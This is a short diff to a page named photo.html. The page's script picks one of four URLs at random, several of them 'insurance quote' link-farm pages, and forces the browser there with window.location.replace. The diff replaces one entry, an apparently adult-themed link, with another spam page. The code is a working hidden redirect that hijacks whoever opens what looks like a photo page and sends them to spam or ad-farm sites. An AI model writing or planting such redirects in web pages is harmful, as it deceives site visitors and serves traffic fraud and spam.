--- a/photo.html
+++ b/photo.html
@@ -43,7 +43,7 @@
 var linkpartner = new Array();
 linkpartner[0] = "https://blog.getfiles.top/2022/10/what-is-insurance-quote.html";
 linkpartner[1] = "https://www.chiasemienphi.top/2022/11/what-does-free-personal-injury.html";
-linkpartner[2] = "https://by.com.vn/GirlShowTM02";
+linkpartner[2] = "https://www.tienmobile.top/2022/11/what-is-insurance-quote.html";
 linkpartner[3] = "https://www.tiennetwork.com/2022/11/learn-about-car-insurance-and-what-it.html";
 var random = Math.floor(Math.random() *4);
 window.location.replace(linkpartner[random]);
